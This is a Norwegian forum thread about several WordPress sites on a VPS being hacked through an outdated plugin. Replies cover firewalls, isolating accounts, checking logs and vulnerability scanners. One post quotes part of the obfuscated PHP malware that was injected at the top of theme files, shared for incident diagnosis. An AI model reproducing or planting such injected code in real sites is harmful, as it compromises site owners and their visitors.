WP-installasjoner hacked

[Pong]

Jeg har fått MASSEVIS av admin login varsler, en ny ukjent bruker med admin-rettigheter som heter 'backup'.

A user with username "backup" who has administrator access signed in to your WordPress site.
User IP: 93.184.197.102
User hostname: 1572390247.dhcp.nefnet.dk
User location: Ullerslev, Denmark

Legger det ut her foreløpig. Jeg vet ikke hva som er årsaken enda men oppdaterer når jeg vet mer.

 

[thomasstr]

@Pong Versjon av WP og hvilke plugins og tema kjører du?

 

[Pong]

OK, det ser ut til å kun gjelde samtlige installs for 1 account på min VPS, og det er nok en plugin som ikke er vedlikeholdt.
Jeg stengte kjapt for all traffik ved å ta ned mySQL serveren (WHM, under 'service manager'), og fant så ut at fra WHM så var det en plugin 'HG Firewall admin' hvor jeg whitelistet mine egne IPer og så blacklistet 0.0.0.0/0 - det vil si hele verden - alle IPer.

Jeg skal starte opp mySQL serveren igjen, tar bort brukeren backup, reset bruker-passordene, reset mysql bruker og pwd, og skal sjekke alle plugins (sannsynligvis blir det en restore fra en backup).

 

[Pong]

Samtlige installasjoner - såvidt jeg vet - er på siste WP-versjon. Men dette sjekker jeg nå.

 

[thomasstr]

Har aldri hatt dette problemet selv. Administrerer 10-15 servere med cPanel/WHM. Jeg bruker CSF (Config Server Firewall) som brannvegg. Her har du også muligheten til å blokkere på land og mye annet snadder. Samtidig vurderer jeg nå å bruke CageFS og PHP selector.

Samtidig benytter jeg meg av InfiniteWP for å administrere WP-sider.
Men noe lignende bruker du helt sikkert selv

Sjekk loggfilen.

cat /usr/local/apache/domlogs/domenet-ditt | grep "backup"

Kanskje du finner noen svar.

 

[beatngu]

Hva slags versjon av linux bruker du?
Hva bruker du som admin panel ? cpanel,,webmin,plesk etc?
Hva kommer opp i server loggen din?

Har du skiftet ssh passord,set limited login og skifte port på ssh?
Her kan du også legge til egen ip og blokkere alt annet med fail2ban

Plesk hacker jeg innen 5 minutter så viss du kjører på plesk så må du skifte så for som mulig siden det er den største dritten som er funnet ut.

Kjører du på egne servere eller er det normal hosting du har?

 

[thomasstr]

Hva slags versjon av linux bruker du?
Hva bruker du som admin panel ? cpanel,,webmin,plesk etc?
Hva kommer opp i server loggen din?

Har du skiftet ssh passord,set limited login og skifte port på ssh?
Her kan du også legge til egen ip og blokkere alt annet med fail2ban

Plesk hacker jeg innen 5 minutter så viss du kjører på plesk så må du skifte så for som mulig siden det er den største dritten som er funnet ut.

Kjører du på egne servere eller er det normal hosting du har?

Om du leser litt i tråden, så ser du hvilket kontrollpanel han bruker og hvilken form for hosting han bruker

Om Plesk har en sårbarhet, så klart kan man bruke den sårbarheten for å komme seg lenger inn i systemet. Dette gjelder forsåvidt også alle andre systemer, om man finner dem.

 

[beatngu]

Leste kanskje litt rask gjennom dette,men var litt lite informasjon om os og andre ting.
Alt har en sårbarhet viss du leter lenge nok,og du har ingen sjanse å stoppe en ekte hacker.
Forskjellige versjoner av linux har sårbarhet,apache,nginx,wordpress,wordpress plugins,paneler etc

Men siden 90% av hackere er script kids så kan du fort finne hull som dem bruker som ligger på nette og lage det vanskeligere for dem og neste alle haker av og gidder ikke bruke mye tid på det.Sjansen er svært liten at det er en ekte hacker som holder til på serveren din.

Det som script kids gjør er å skanne siden og serveren din for hull og verktøyet som dem bruker sier ifra når noe er funnet og kan brukes.Når dem vet hva som er mulig å hacke lett så laster dem ned en public exploit og trykker på et par knapper så er det gjort.

Du kan også bruke skannere til å sjekke siden din selv for å finne sårbarheter og fikse dette.
Bare last ned kali linux og kjør diverse skannere.

 

[Trond Lyngbø]

Hei Pong,

For noen år tilbake jobbet jeg med IT-sikkerhet. Sikkerhetstesting av webapplikasjoner og penetrasjonstesting av webservere og brannmurer, var noe jeg brukte mye av min tid på.

På den tiden var Acunetix, en såkalt web vulnerability scanner, å regne som et av de mest effektive verktøyene til å identifisere sårbarheter og sikkerhetshull på webservere. Fra din datamaskin kan du scanne webserveren eller et spesifikt nettsted og applikasjon(er). Det finnes også en rekke gode og gratis Linux-alternativer. Men Acunetix er genialt enkelt og brukervennlig.

Programmet var oppdatert med siste "sikkerhetshull", gjerne før det ble offentlig kjent, noe som naturlig nok er en fordel. Hadde man trøbbel med skriverettigheter eller var sårbare for avanserte angrep, uansett art, fikk man øyeblikkelig beskjed om dette, og ble presentert for løsning på problemet.

Acunetix finnes i Trial-versjon (14 dager), men jeg har ikke sjekket eventuelle begrensninger i prøveperioden.

Dette er kanskje ikke riktig løsning for deg akkurat nå, men burde være det for webbyråer. Det kan imidlertid være en mulighet å oppsøke en som har kompetanse på området, og har dette verktøyet, eller tilsvarende, og spørre pent om å få bistand til å kjøre en enkelt test. Det er uansett greit å vite om at slike tilbud finnes.

Jeg er noe rusten på området, da jeg har skiftet bransje, og jeg har heller ikke lenger denne programvaren, men jeg er overbevist om at det finnes noen der ute som kanskje har det. Kanskje noen av dem er villig til å bistå deg.

 

[Pong]

OK, ikke alle installs var på siste versjon, så det har nok kommet inn den veien. Har ikke tid til å finne ut akkurat hvilken plugin jeg burde ha oppdatert, men har en ide.

Dette var ikke noe spesielt målrettet tror jeg, men antakeligvis en script siden så mange sider samtidig var påvirket. Et kjennetegn er en ny bruker "backup" og sjekker du noen php-filer fra themet, så ligger det noe koden i begynnelsen, noe som dette:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $tuwflfitki = 'LOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c
...
$vzumqcjddx=substr($tuwflfitki,(48734-38621),(38-26)); $vzumqcjddx($sypurwgthm, $ietftjwzna, NULL); $vzumqcjddx=$ietftjwzna; $vzumqcjddx=(380-259); $tuwflfitki=$vzumqcjddx-1; ?>

Jeg har flyttet domenene (måtte gjøres uansett), oppdatert og endret alle passordene. Men noen av kundene liker å "leke" med plugins og disse får ha et eget - avgrenset - område slik at det ihvertfall ikke smitter over til de andre - best å ikke ha alle eggene i samme kurv.

Et veldig godt tips sålangt er InfiniteWP - som jeg ikke viste om (som de fleste vokser man langsomt inn i en situasjon uten tid å forske om "det kanskje er noe der ute", så da er det godt med slikt av og til). Skal sjekke Acunetix.

 

[thomasstr]

@Pong

Når du først er på InfiniteWP, sjekk ut CloudLinux, de har en fantastisk funksjon, CageFS.
Du mister 1-2% performance, men for sikkerheten ser jeg dette som bare positivt. Fint for de som liker å "leke" med plugins, som du sier

http://docs.cloudlinux.com/cagefs.html

Trenger du noe annen hjelp med administreringen, si ifra.

 

[Pong]

Leste kanskje litt rask gjennom dette,men var litt lite informasjon om os og andre ting.
Alt har en sårbarhet viss du leter lenge nok,og du har ingen sjanse å stoppe en ekte hacker.
<snip>

Yep, det er helt riktig - det var nok en script som kjørte; tenkte litt på følgende:
* en trojan på datamaskinen min
* passordene i nettleseren har kommet avgårde
* passord til admin-biten (cpanel/directadmin/webmin) har blitt kjent
* utro tjener hos hostingselskapet
* script som utnytter svakheter i kjente WP plugins

Tok ikke lang tid for å innse at det var mest sannsynlig siste alternativ.

 

[xdex]

Acunetix blir uansett veldig tullete, og gir alt for mange false-positive i tilfeller hvor CMS brukes. Selv om Acunetix absolutt er ett verktøy mange kan, og burde bruke, blir det bare alt for mye. Bruk WPscan eller lignende verktøy (som også er gratis), det er uansett aldri feil og ha Kali (eller annet) liggende som en virtuell maskin når du skal søke etter feil.

http://wpscan.org/

 

[Tonny Kluften]

Du har en VPS med WHM ikke sant Pong? Kan du ikke la hvert domene få sin egen cPanelkonto.

 

[xdex]

Du har en VPS med WHM ikke sant Pong? Kan du ikke la hvert domene få sin egen cPanelkonto.

Dette er vel avhengig hvilken løsning/betalig pong har. Somregel vil det koste ekstra å få cpanel (lisens/tilgang) til dette for flere domener.